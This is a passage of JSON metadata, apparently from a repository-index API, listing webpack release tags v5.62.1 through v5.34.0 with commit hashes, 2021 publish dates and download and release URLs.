","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"